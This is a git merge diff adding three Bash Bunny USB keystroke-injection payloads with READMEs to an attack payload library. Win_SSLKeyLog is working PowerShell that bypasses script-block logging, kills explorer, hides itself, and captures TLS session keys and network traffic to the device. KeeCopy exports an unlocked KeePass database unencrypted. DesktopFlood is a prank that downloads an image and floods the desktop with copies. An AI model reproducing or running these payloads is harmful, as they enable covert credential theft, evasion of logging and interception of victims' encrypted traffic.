Merge branch 'hak5:master' into master

payloads/library/credentials/win_sslkeylog/README.md

@@ -0,0 +1,63 @@
+# "Microsoft Windows" SSLKEYLOG
+
+- Title:         Win_SSLKeyLog
+- Author:        TW-D
+- Version:       1.0
+- Target:        Microsoft Windows
+- Category:      Credentials      
+
+## Description
+
+>
+> Captures the client network session.
+> 
+> Captures the client side session keys.
+>
+
+1) Partially avoids "PowerShell Script Block Logging".
+2) Closing of all windows.
+3) Hide "PowerShell" window.
+4) Check if current process have "Administrator" privilege.
+5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information. 
+6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)".
+7) Writes the file system cache to disk.
+8) Safely eject.
+
+## Configuration
+
+From "payload.txt" change the values of the following constants :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+readonly SNIFFING_TIME=300
+
+
+```
+
+## Required
+
+Utility that converts an .etl file containing a Windows network packet capture into .pcapng format.
+[ETL2PCAPNG](https://github.com/microsoft/etl2pcapng)
+
+Wireshark network protocol analyzer.
+[WIRESHARK](https://www.wireshark.org/)
+
+## Steps
+
+Convert "capture.etl" file into "capture.pcapng" with "etl2pcapng".
+```
+.\etl2pcapng.exe .\capture.etl .\capture.pcapng
+```
+
+Open your "capture.pcapng" with "Wireshark".
+
+Configure "Wireshark" for HTTPS decryption.
+```
+Edit - Preferences
+Protocols - (SSL and/or TLS)
+(Pre)-Master-Secret log filename -> Browse -> SSLKEYLOGFILE.txt
+```
+
+Happy hunting.

payloads/library/credentials/win_sslkeylog/payload.ps1

@@ -0,0 +1,58 @@
+#
+# Author:       TW-D
+# Version:      1.0
+#
+
+Param (
+    [String] $BB_VOLUME,
+    [Int] $SNIFFING_TIME
+)
+
+# Partially avoids "PowerShell Script Block Logging".
+#
+$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
+$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
+$etw_provider.SetValue($null, $event_provider)
+
+# Closing of all windows.
+#
+Get-Process -Name "explorer" | Stop-Process
+    
+# Hide "PowerShell" window.
+#
+$Script:showWindowAsync = Add-Type -MemberDefinition @"
+[DllImport("user32.dll")]
+public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
+"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
+$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
+
+# Check if current process have "Administrator" privilege.
+#
+If ( ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") ) {
+
+    $bb_loot = "${BB_VOLUME}loot\"
+    
+    # Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information.
+    #
+    [Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", $null, "User")
+    [Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", "${bb_loot}SSLKEYLOGFILE.txt", "User")
+
+    # Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)".
+    #
+    (NETSH trace start capture=yes report=no persistent=yes traceFile="${bb_loot}capture.etl" maxSize=0 fileMode=append) | Out-Null
+    Start-Sleep -Seconds $SNIFFING_TIME
+    (NETSH trace stop) | Out-Null
+
+    [Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", $null, "User")
+
+}
+
+"Win_SSLKeyLog terminated." | Out-File -FilePath .\..\..\loot\done.txt -Force
+
+# Writes the file system cache to disk (thanks to @dark_pyrro).
+#
+Write-VolumeCache -DriveLetter ("${BB_VOLUME}".Substring(0,1))
+
+# Safely eject (thanks to @Night (9o3)).
+#
+(New-Object -ComObject Shell.Application).Namespace(17).ParseName("${BB_VOLUME}").InvokeVerb("Eject")

payloads/library/credentials/win_sslkeylog/payload.txt

@@ -0,0 +1,108 @@
+#!/bin/bash
+#
+# Title:            Win_SSLKeyLog
+#
+# Description:      
+#                   Captures the client network session.
+#                   Captures the client side session keys.
+#
+#                   1) Partially avoids "PowerShell Script Block Logging".
+#                   2) Closing of all windows.
+#                   3) Hide "PowerShell" window.
+#                   4) Check if current process have "Administrator" privilege.
+#                   5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information. 
+#                   6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)".
+#                   7) Writes the file system cache to disk (thanks to @dark_pyrro).
+#                   8) Safely eject (thanks to @Night (9o3)).
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Credentials
+# Target:           Microsoft Windows 10
+# Attackmodes:      HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
+# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
+#
+# REQUIREMENTS
+# ===============
+# The target user must belong to the 'Administrator' group.
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Cyan inverted single blink ...................... SPECIAL
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+readonly SNIFFING_TIME=300
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+udisk mount
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 5000
+Q GUI r
+Q DELAY 5000
+Q STRING "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
+Q DELAY 1500
+Q CTRL-SHIFT ENTER
+Q DELAY 5000
+Q LEFTARROW
+Q DELAY 3000
+Q ENTER
+Q DELAY 7000
+
+LED STAGE2
+
+Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)\""
+Q ENTER
+Q DELAY 3500
+
+Q STRING "\$BB_SWITCH = \"\${BB_VOLUME}payloads\\${SWITCH_POSITION}\\\""
+Q ENTER
+Q DELAY 1500
+
+Q STRING "CD \"\${BB_SWITCH}\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING ".\payload.ps1 -BB_VOLUME \"\${BB_VOLUME}\" -SNIFFING_TIME ${SNIFFING_TIME}"
+Q ENTER
+Q DELAY 1500
+
+LED SPECIAL
+
+until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+rm /root/udisk/loot/done.txt
+sync
+udisk unmount
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0

payloads/library/exfiltration/keecopy/README.md

@@ -0,0 +1,33 @@
+# KeePass Automated Exporter
+
+- Title:         KeeCopy
+- Author:        jrwimmer
+- Version:       1.0
+- Target:        Windows Vista+
+- Category:      Exfiltration
+
+## Description
+
+Performs keystroke automation to export an unencrypted copy of an unlocked KeePass database
+The copy is saved to the loot folder on the Bash Bunny USB Mass Storage partition
+
+Important Considerations:
+
+This script makes the following assumptions.
+- The target computer is unlocked
+- The target computer has KeePass 2.x installed and running with an unlocked database
+- KeePass only has one database open, or the desired database was the last one in focus
+- KeePass is using the default "Show KeePass window" hot key of: `Ctrl + Alt + K`
+
+## Configuration
+
+Hot key settings and/or script tweaks may be necessary depending on the target system.
+
+## STATUS
+
+| LED      | Status                    |
+| -------- | ------------------------- |
+| STAGE1   | Determine output location |
+| STAGE2   | Export database           |
+| FINISH   | Payload complete          |
+

payloads/library/exfiltration/keecopy/payload.txt

@@ -0,0 +1,102 @@
+#!/bin/bash
+#
+# Title:         KeeCopy
+# Description:   All-in-one script using keystroke automation to export an unencrypted copy of an unlocked KeePass database.
+#                The database copy is saved to the loot folder on the Bash Bunny USB Mass Storage partition
+# Author:        jrwimmer
+# Version:       1.0
+# Category:      Exfiltration
+# Target:        Windows Vista+ (PowerShell, clip.exe)
+# Attackmodes:   HID, Storage
+#
+#
+
+##################################
+# Options                        #
+##################################
+
+# KEEPASS_SHOW (DUCKY KEY COMBO) - Specify the hot key combination anticipated to show the KeePass window
+KEEPASS_SHOW="CTRL-ALT k"
+
+# KEEPASS_WAITSAVE (MILLISECONDS) - How long to wait for KeePass to complete the export
+KEEPASS_WAITSAVE=5000
+
+# POWEROFF_AFTER (Y/N) - Power down the BashBunny upon completion
+POWEROFF_AFTER="Y"
+
+
+##################################
+# Stage 1: Determine destination #
+##################################
+LED STAGE1
+
+# Activate HID and STORAGE capabilities
+ATTACKMODE HID STORAGE
+
+# Open PowerShell
+RUN WIN powershell.exe
+QUACK DELAY 2000
+
+# Locate the BashBunny volume and store it on the clipboard
+QUACK STRING "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \"(gwmi win32_volume -Filter {label='BashBunny'}).Name\" | clip;exit"
+QUACK ENTER
+
+##################################
+# Stage 2: Export database       #
+##################################
+LED STAGE2
+
+# Open KeePass
+QUACK $KEEPASS_SHOW
+QUACK DELAY 500
+
+# Open the File menu
+QUACK ALT f
+QUACK DELAY 100
+
+# Select "Export"
+QUACK e
+QUACK DELAY 100
+
+# Move focus into the format selector
+QUACK TAB
+QUACK TAB
+
+# Skip down to "Customizable HTML File"
+QUACK c
+
+# Move up to "KeePass XML (2.x)"
+QUACK UP
+
+# Move focus to the Destination File field
+QUACK TAB
+
+# Paste the path copied in STAGE1
+QUACK CTRL v
+
+# Append the rest of the destination path
+QUACK STRING "loot\KPDB-$(date +%Y%m%d-%k%M%S).xml"
+
+# ...and export!
+QUACK ENTER
+
+# Wait for KeePass to complete the export
+QUACK DELAY $KEEPASS_WAITSAVE
+
+##################################
+# Cleanup                        #
+##################################
+LED CLEANUP
+
+# Synchronize disks
+SYNC
+
+##################################
+# Finish                         #
+##################################
+LED FINISH
+
+# Power off
+if [ $POWEROFF_AFTER == "Y" ]; then
+    halt --poweroff
+fi

payloads/library/prank/DesktopFlood/README.md

@@ -0,0 +1,13 @@
+# DesktopFlood
+Floods the desktop with a image of your choice
+
+## Configuration
+Image Link, Image Name, Amount of Images. Bluetooth if you want, in Setup
+
+## LED
+
+|  COLOR  | DESCRIPTION |
+|---------|-------------|
+| White   | Setup/Wait  |
+| Yellow  | Attacking   |
+| Green   | Finished    |

payloads/library/prank/DesktopFlood/payload.txt

@@ -0,0 +1,46 @@
+#!/bin/bash
+#
+# Title: 	Desktop Flood
+# Description:	Floods desktop with image it downloads from link
+# Author:	JustaProgrammer9
+# Category:	Prank
+# Target:	Windows
+# Attackmodes:	HID
+#
+
+#--// CONFIG \\--#
+
+#removing [ https:// ] can help keep command below runbox character limit
+
+ImageLink='i.ytimg.com/vi/7yN0g2QIJSU/maxresdefault.jpg'
+
+ImageName="Gift"
+
+Amount=50
+
+
+####--// SETUP \\--####
+
+LED W
+
+ATTACKMODE HID
+
+#--> FOR BLUETOOTH <--#
+
+#WAIT_FOR_PRESENT YourDevice
+#WAIT_FOR_NOT_PRESENT YourDevice
+
+
+#--// ATTACK \\--#
+
+LED Y
+
+RUN WIN "cmd /c powershell \"curl $ImageLink -O C:\Users\%USERNAME%\Desktop\\$ImageName.jpg;sleep 1;1..$Amount | % { copy-Item \"C:\Users\%USERNAME%\desktop\\$ImageName.jpg\" \"C:\Users\%USERNAME%\desktop\\$ImageName\$_.jpg\"}\""
+
+Q ENTER
+
+
+####--// DONE \\--####
+
+LED G
+